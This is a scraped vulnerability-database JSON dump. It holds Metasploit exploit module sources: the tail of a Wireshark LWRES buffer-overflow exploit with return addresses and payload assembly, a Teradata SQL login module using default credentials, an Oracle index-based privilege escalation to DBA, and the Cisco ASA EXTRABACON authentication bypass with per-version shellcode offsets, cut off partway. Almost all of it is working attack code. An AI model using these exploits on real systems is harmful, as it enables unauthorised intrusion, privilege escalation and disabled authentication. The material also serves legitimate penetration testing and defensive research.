'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx 
/ jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 
0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif 
(target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? 
and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "3c6a8d7871a26d25fc3baf3434df41d3", "key": "href"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "5c332f906abeecc92a7bcff7e9d88720", "key": "sourceData"}, {"hash": "eb5bd49a56945770ae0d7eee92cc7daf", "key": "sourceHref"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-28T14:42:14", "bulletinFamily": "exploit", "description": "SQL query module for ODBC connections to local Teradata databases. Port specification (TCP 1025 by default) is not necessary for ODBC connections. Requires ODBC driver and Python Teradata module.\n", "modified": "2018-09-13T18:09:01", "published": "2018-05-29T15:12:43", "id": "MSF:AUXILIARY/ADMIN/TERADATA/TERADATA_ODBC_SQL", "href": "", "type": "metasploit", "title": "Teradata ODBC SQL Query Module", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n#2018-05-09 14-15\n\n# Standard Modules\nimport logging\n\n# Extra Modules\ndependencies_missing = False\ntry:\n import teradata\nexcept ImportError:\n dependencies_missing = True\n\nfrom metasploit import module\n\n\n# Metasploit Metadata\nmetadata = {\n 'name': 'Teradata ODBC SQL Query Module',\n 'description': '''\n SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.\n ''',\n 'authors': [\n 'Ted Raffle (actuated)'\n ],\n 'date': '2018-03-29',\n 'license': 'MSF_LICENSE',\n 'references': [\n {'type': 'url', 'ref': 'https://developer.teradata.com/tools/reference/teradata-python-module'},\n {'type': 'url', 'ref': 'https://downloads.teradata.com/download/connectivity/odbc-driver/linux'}\n ],\n 'type': 'single_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},\n 'rport': {'type': 'port', 'description': 'Port to target, ignored by the ODBC driver', 'required': True, 'default': 1025},\n 'username': {'type': 'string', 'description': 'Username', 'required': True, 'default': 'dbc'},\n 'password': {'type': 'string', 'description': 'Password', 'required': True, 'default': 'dbc'},\n 'sql': {'type': 'string', 'description': 'SQL query to perform', 'required': True, 'default': 'SELECT DATABASENAME FROM 
DBC.DATABASES'},\n },\n 'notes': {\n 'AKA': ['Teradata ODBC Authentication Scanner']\n }\n}\n\n\n# Run function\ndef run(args):\n\n # Define UdaExec ODBC connection \"application\", must be before LogHandler\n udaExec = teradata.UdaExec(appName=\"Auth\", version=\"1.0\", logConsole=False, configureLogging=False)\n\n # Metasploit LogHandler\n module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))\n\n # Return error for missing dependency\n if dependencies_missing:\n logging.error('Python Teradata module missing, cannot continue')\n return\n\n # Set variables to current RHOST, and USERNAME and PASSWORD options\n host = args['rhost']\n user = args['username']\n password = args['password']\n\n # Perform login attempt\n module.log(host + ' - ' + user + ':' + password + ' - Starting')\n try:\n session = udaExec.connect(method=\"odbc\", system=host, username=user, password=password);\n except teradata.api.Error as e:\n logging.error(user + ':' + password + ' - ' + format(e))\n return\n else:\n module.log(host + ' - ' + user + ':' + password + ' - Login Successful', level='good')\n try:\n query = args['sql']\n module.log(host + ' - Starting - ' + query)\n for row in session.execute(query):\n outputRow=str(row)\n module.log(host + ' - ' + outputRow, level='good')\n except teradata.api.Error as e:\n logging.error(format(e))\n return\n\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/teradata/teradata_odbc_sql.py"}, {"lastseen": "2019-11-21T16:32:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. 
Credits to David Litchfield for publishing the technique.\n", "modified": "2018-12-10T17:21:16", "published": "2017-08-07T03:07:46", "id": "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "href": "", "type": "metasploit", "title": "Oracle DB Privilege Escalation via Function-Based Index", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.\n },\n 'Author' =>\n [\n 'David Litchfield', # Vulnerability discovery and exploit\n 'Moshe Kaplan', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],\n ],\n 'DisclosureDate' => 'Jan 21 2015'))\n\n register_options(\n [\n OptString.new('SQL', [ true, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\" ]),\n OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),\n ])\n end\n\n def run\n return unless check_dependencies\n\n func_name = Rex::Text.rand_text_alpha(6..10)\n\n create_function = <<-EOF\n CREATE OR REPLACE FUNCTION #{func_name}\n (FOO varchar) return varchar\n deterministic authid current_user is\n pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL'].gsub(\"'\", \"\\\\\\\\'\")}';\n commit;\n return '';\n end;\n EOF\n\n index_name = Rex::Text.rand_text_alpha(6..10)\n param_value = Rex::Text.rand_text_alpha(2..6)\n\n create_index = \"CREATE INDEX #{index_name} ON \" \\\n 
\"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))\"\n\n trigger = \"SELECT * FROM #{datastore['TABLE']}\"\n\n clean_index = \"drop index #{index_name}\"\n clean_func = \"drop function #{func_name}\"\n\n print_status('Running exploit...')\n\n begin\n print_status(\"Attempting to create function #{func_name}...\")\n prepare_exec(create_function)\n print_status(\"Attempting to create index #{index_name}...\")\n prepare_exec(create_index)\n print_status('Querying to trigger function...')\n prepare_exec(trigger)\n print_status('Cleaning up index...')\n prepare_exec(clean_index)\n print_status('Cleaning up function...')\n prepare_exec(clean_func)\n print_status('Exploit complete!')\n rescue ::OCIError => e\n print_error(\"Error! #{e.message}\")\n end\n end\n\n def prepare_exec(query)\n print_status(query)\n super\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/oracle_index_privesc.rb"}, {"lastseen": "2019-11-24T21:38:54", "bulletinFamily": "exploit", "description": "This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-22T21:24:49", "id": "MSF:AUXILIARY/ADMIN/CISCO/CISCO_ASA_EXTRABACON", "href": "", "type": "metasploit", "title": "Cisco ASA Authentication Bypass (EXTRABACON)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Cisco\n\n def initialize\n super(\n 'Name' => 'Cisco ASA Authentication Bypass (EXTRABACON)',\n 'Description' => %q{\n This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. 
Uses improved shellcode for payload.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>',\n 'Zachary Harding <zachary.harding@risksense.com>',\n 'Nate Caroe <nate.caroe@risksense.com>',\n 'Dylan Davis <dylan.davis@risksense.com>',\n 'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes\n 'Jeff Jarmoc <jjarmoc>', # minor improvements\n 'Equation Group',\n 'Shadow Brokers'\n ],\n 'References' =>\n [\n [ 'CVE', '2016-6366'],\n [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],\n [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],\n ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n ['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],\n ['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]\n ],\n 'DefaultAction' => 'PASS_DISABLE'\n )\n\n @offsets = version_offsets()\n\n register_options([\n OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),\n ])\n\n deregister_options(\"VERSION\")\n datastore['VERSION'] = '2c' # SNMP v. 
2c required it seems\n end\n\n def version_offsets()\n # Payload offsets for supported ASA versions.\n # See https://github.com/RiskSense-Ops/CVE-2016-6366\n return {\n \"9.2(4)13\" => [\"197.207.10.8\", \"70.97.40.9\", \"72\", \"0.16.185.9\", \"240.30.185.9\", \"85.49.192.137\", \"0.80.8.8\", \"240.95.8.8\", \"85.137.229.87\"],\n \"9.2(4)\" => [\"101.190.10.8\", \"54.209.39.9\", \"72\", \"0.48.184.9\", \"192.52.184.9\", \"85.49.192.137\", \"0.80.8.8\", \"0.91.8.8\", \"85.137.229.87\"],\n \"9.2(3)\" => [\"29.112.29.8\", # jmp_esp_offset, 0\n \"134.115.39.9\", # saferet_offset, 1\n \"72\", # fix_ebp, 2\n \"0.128.183.9\", # pmcheck_bounds, 3\n \"16.128.183.9\", # pmcheck_offset, 4\n \"85.49.192.137\", # pmcheck_code, 5\n \"0.80.8.8\", # admauth_bounds, 6\n \"64.90.8.8\", # admauth_offset, 7\n \"85.137.229.87\"], # admauth_code, 8\n \"9.2(2)8\" => [\"21.187.10.8\", \"54.245.39.9\", \"72\", \"0.240.183.9\", \"16.252.183.9\", \"85.49.192.137\", \"0.80.8.8\", \"64.90.8.8\", \"85.137.229.87\"],\n \"9.2(1)\" => [\"197.180.10.8\", \"54.118.39.9\", \"72\", \"0.240.182.9\", \"16.252.182.9\", \"85.49.192.137\", \"0.80.8.8\", \"176.84.8.8\", \"85.137.229.87\"],\n \"9.1(1)4\" => [\"173.250.27.8\", \"134.177.3.9\", \"72\", \"0.112.127.9\", \"176.119.127.9\", \"85.49.192.137\", \"0.48.8.8\", \"96.49.8.8\", \"85.137.229.87\"],\n \"9.0(1)\" => [\"221.227.27.8\", \"134.13.3.9\", \"72\", \"0.176.126.9\", \"112.182.126.9\", \"85.49.192.137\", \"0.32.8.8\", \"240.45.8.8\", \"85.137.229.87\"],\n \"8.4(7)\" => [\"109.22.18.8\", \"70.254.226.8\", \"72\", \"0.144.87.9\", \"80.156.87.9\", \"85.49.192.137\", \"0.32.8.8\", \"0.34.8.8\", \"85.137.229.87\"],\n \"8.4(6)5\" => [\"125.63.32.8\", \"166.11.228.8\", \"72\", \"0.176.88.9\", \"96.186.88.9\", \"85.49.192.137\", \"0.32.8.8\", \"240.33.8.8\", \"85.137.229.87\"],\n \"8.4(4)9\" => [\"173.23.5.8\", \"166.113.226.8\", \"72\", \"0.144.86.9\", \"224.154.86.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)5\" => 
[\"202.250.13.8\", \"246.48.226.8\", \"72\", \"0.64.86.9\", \"16.69.86.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)3\" => [\"164.119.8.8\", \"102.0.226.8\", \"72\", \"0.240.85.9\", \"96.252.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)1\" => [\"253.74.114.8\", \"150.236.225.8\", \"72\", \"0.192.85.9\", \"176.202.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"176.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)\" => [\"111.198.161.9\", \"181.105.226.8\", \"72\", \"0.192.85.9\", \"240.201.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"176.27.8.8\", \"85.137.229.87\"],\n \"8.4(3)\" => [\"13.178.7.8\", \"150.219.224.8\", \"72\", \"0.192.84.9\", \"208.207.84.9\", \"85.49.192.137\", \"0.16.8.8\", \"208.23.8.8\", \"85.137.229.87\"],\n \"8.4(2)\" => [\"25.71.20.9\", \"230.222.223.8\", \"72\", \"0.128.83.9\", \"240.143.83.9\", \"85.49.192.137\", \"0.16.8.8\", \"224.19.8.8\", \"85.137.229.87\"],\n \"8.4(1)\" => [\"173.58.17.9\", \"6.12.219.8\", \"72\", \"0.240.72.9\", \"240.252.72.9\", \"85.49.192.137\", \"0.48.8.8\", \"144.56.8.8\", \"85.137.229.87\"],\n \"8.3(2)40\" => [\"169.151.13.8\", \"124.48.196.8\", \"88\", \"0.128.59.9\", \"48.137.59.9\", \"85.49.192.137\", \"0.224.6.8\", \"32.228.6.8\", \"85.137.229.87\"],\n \"8.3(2)39\" => [\"143.212.14.8\", \"124.48.196.8\", \"88\", \"0.128.59.9\", \"176.136.59.9\", \"85.49.192.137\", \"0.224.6.8\", \"32.228.6.8\", \"85.137.229.87\"],\n \"8.3(2)\" => [\"220.203.69.9\", \"252.36.195.8\", \"88\", \"0.80.54.9\", \"144.84.54.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.222.6.8\", \"85.137.229.87\"],\n #\"8.3(2)-npe\" => [\"125.116.12.8\", \"76.34.195.8\", \"88\", \"0.80.54.9\", \"224.81.54.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.222.6.8\", \"85.137.229.87\"],\n \"8.3(1)\" => [\"111.187.14.8\", \"140.140.194.8\", \"88\", \"0.112.53.9\", \"240.119.53.9\", \"85.49.192.137\", \"0.208.6.8\", \"48.221.6.8\", \"85.137.229.87\"],\n \"8.2(5)41\" => [\"77.90.18.8\", 
\"188.9.187.8\", \"88\", \"0.160.50.9\", \"16.168.50.9\", \"85.49.192.137\", \"0.240.6.8\", \"16.243.6.8\", \"85.137.229.87\"],\n \"8.2(5)33\" => [\"157.218.29.8\", \"236.190.186.8\", \"88\", \"0.80.50.9\", \"96.92.50.9\", \"85.49.192.137\", \"0.240.6.8\", \"192.242.6.8\", \"85.137.229.87\"],\n \"8.2(5)\" => [\"253.13.54.9\", \"156.229.185.8\", \"88\", \"0.16.48.9\", \"96.28.48.9\", \"85.49.192.137\", \"0.240.6.8\", \"64.242.6.8\", \"85.137.229.87\"],\n \"8.2(4)\" => [\"93.172.49.9\", \"236.91.185.8\", \"88\", \"0.176.43.9\", \"96.187.43.9\", \"85.49.192.137\", \"0.240.6.8\", \"16.242.6.8\", \"85.137.229.87\"],\n \"8.2(3)\" => [\"45.0.7.8\", \"252.42.185.8\", \"88\", \"0.96.43.9\", \"128.111.43.9\", \"85.49.192.137\", \"0.240.6.8\", \"144.241.6.8\", \"85.137.229.87\"],\n \"8.2(2)\" => [\"150.54.28.9\", \"124.0.184.8\", \"88\", \"0.224.41.9\", \"32.227.41.9\", \"85.49.192.137\", \"0.208.6.8\", \"64.221.6.8\", \"85.137.229.87\"],\n \"8.2(1)\" => [\"147.242.43.9\", \"108.154.181.8\", \"88\", \"0.0.36.9\", \"240.14.36.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.215.6.8\", \"85.137.229.87\"],\n \"8.0(5)\" => [\"253.116.31.9\", \"204.64.171.8\", \"88\", \"0.32.24.9\", \"64.32.24.9\", \"85.49.192.137\", \"0.96.6.8\", \"128.107.6.8\", \"85.137.229.87\"],\n \"8.0(4)32\" => [\"157.6.31.9\", \"44.20.171.8\", \"88\", \"0.176.23.9\", \"0.176.23.9\", \"85.49.192.137\", \"0.96.6.8\", \"48.105.6.8\", \"85.137.229.87\"],\n \"8.0(4)\" => [\"109.188.26.9\", \"140.100.168.8\", \"88\", \"0.96.19.9\", \"128.101.19.9\", \"85.49.192.137\", \"0.96.6.8\", \"176.104.6.8\", \"85.137.229.87\"],\n \"8.0(3)6\" => [\"191.143.24.9\", \"28.158.161.8\", \"88\", \"0.0.11.9\", \"224.1.11.9\", \"85.49.192.137\", \"0.96.6.8\", \"112.101.6.8\", \"85.137.229.87\"],\n \"8.0(3)\" => [\"141.123.131.9\", \"156.138.160.8\", \"88\", \"0.128.9.9\", \"112.130.9.9\", \"85.49.192.137\", \"0.96.6.8\", \"176.96.6.8\", \"85.137.229.87\"],\n \"8.0(2)\" => [\"155.222.211.8\", \"44.103.159.8\", \"88\", \"0.224.6.9\", 
\"32.237.6.9\", \"85.49.192.137\", \"0.80.6.8\", \"48.90.6.8\", \"85.137.229.87\"]\n }\n end\n\n def check\n begin\n vers_string = get_asa_version()\n rescue ::Exception => e\n print_error(\"Error: Unable to retrieve version information\")\n return Exploit::CheckCode::Unknown\n end\n\n if @offsets[vers_string]\n print_good(\"Payload for Cisco ASA version #{vers_string} available!\")\n return Exploit::CheckCode::Appears\n end\n\n print_warning(\"Received Cisco ASA version #{vers_string}, but no payload available\")\n return Exploit::CheckCode::Detected\n end\n\n def build_payload(vers_string, mode)\n # adds offsets to the improved shellcode\n # https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm\n\n if mode == 'PASS_DISABLE'\n always_return_true = \"49.192.64.195\"\n pmcheck_bytes = always_return_true\n admauth_bytes = always_return_true\n else # PASS_ENABLE\n pmcheck_bytes = @offsets[vers_string][5]\n admauth_bytes = @offsets[vers_string][8]\n end\n\n preamble_snmp = \"\"\n preamble_snmp << \"49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187.\"\n preamble_snmp << @offsets[vers_string][3]\n preamble_snmp << \".205.128.88.187.\"\n preamble_snmp << @offsets[vers_string][6]\n preamble_snmp << \".205.128.199.5.\"\n preamble_snmp << @offsets[vers_string][4]\n preamble_snmp << \".\"\n preamble_snmp << pmcheck_bytes\n preamble_snmp << \".199.5.\"\n preamble_snmp << @offsets[vers_string][7]\n preamble_snmp << \".\"\n preamble_snmp << admauth_bytes\n preamble_snmp << \".97.104.\"\n preamble_snmp << @offsets[vers_string][1]\n preamble_snmp << \".128.195.16.191.11.15.15.15.137.229.131.197.\"\n preamble_snmp << @offsets[vers_string][2]\n preamble_snmp << \".195\"\n\n preamble_len = preamble_snmp.split('.').length\n preamble_snmp << \".144\" * (82 - preamble_len)\n\n # cufwUrlfServerStatus\n head = \"1.3.6.1.4.1.9.9.491.1.3.3.1.1.5\"\n head << \".9.95\"\n\n finder_snmp = \"139.124.36.20.139.7.255.224.144\"\n\n overflow = [head, 
preamble_snmp, @offsets[vers_string][0], finder_snmp].join(\".\")\n return overflow\n end\n\n def run()\n begin\n session = rand(255) + 1\n\n vers_string = get_asa_version()\n\n print_status(\"Building #{action.name} payload for version #{vers_string}...\")\n overflow = build_payload(vers_string, action.name)\n payload = SNMP::ObjectId.new(overflow)\n\n print_status(\"Sending SNMP payload...\")\n response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])\n\n if response.varbind_list\n print_good(\"Clean return detected!\")\n if action.name == 'PASS_DISABLE'\n print_warning(\"Don't forget to run PASS_ENABLE after logging in!\")\n print_warning(\" set ACTION PASS_ENABLE\")\n end\n end\n\n rescue ::Rex::ConnectionError\n print_error(\"Connection Error: Is the target up?\")\n rescue ::SNMP::RequestTimeout\n print_error(\"SNMP Error: Request Timeout, Cisco ASA may have crashed :/\")\n rescue ::SNMP::UnsupportedVersion\n print_error(\"SNMP Error: Version 2c is not supported by target.\")\n rescue ::NoMethodError\n print_error(\"Error: No payload available for version #{vers_string}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error: #{e.class} #{e} #{e.backtrace}\")\n ensure\n disconnect_snmp\n end\n end\n\n def get_asa_version()\n return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')\n vprint_status(\"Fingerprinting via SNMP...\")\n\n asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'\n mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'\n\n snmp = connect_snmp\n ver = snmp.get_value(asa_version_oid).to_s\n vprint_status(\"OID #{asa_version_oid} yields #{ver}\")\n\n if (ver == \"noSuchInstance\")\n # asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr\n ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last\n vprint_status(\"OID #{mib2_sysdescr_oid} yields #{ver}\")\n 